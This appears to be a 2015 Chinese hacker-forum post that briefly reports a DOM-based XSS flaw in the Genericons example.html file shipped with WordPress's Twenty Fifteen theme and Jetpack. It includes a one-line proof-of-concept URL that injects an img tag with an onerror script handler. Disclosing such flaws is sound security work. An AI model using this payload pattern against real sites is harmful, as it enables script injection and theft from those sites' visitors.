搜索
中国白客联盟»论坛 Techniques XSS(Cross-site scripting attacks) WordPress默认主题存在DOM XSS(跨站脚本)漏洞,影响百 ...
返回列表 发新帖
查看: 415|回复: 0

WordPress默认主题存在DOM XSS(跨站脚本)漏洞,影响百万用户

[复制链接]
admin

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2015-5-7 21:05:09 | 显示全部楼层 |阅读模式
使用了Genericons包的WordPress插件或主题都可能受一个基于DOM的xss漏洞影响,因为WordPress默认主题Twenty Fifteen及知名插件Jetpack都包含了存在漏洞的页面example.html,影响百万用户。
  1. http://site.com/wp-content/themes/twentyfifteen/genericons/example.html#1<img/ src=1 onerror= alert(1)>
复制代码
过段时间可能会取消签到功能了
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表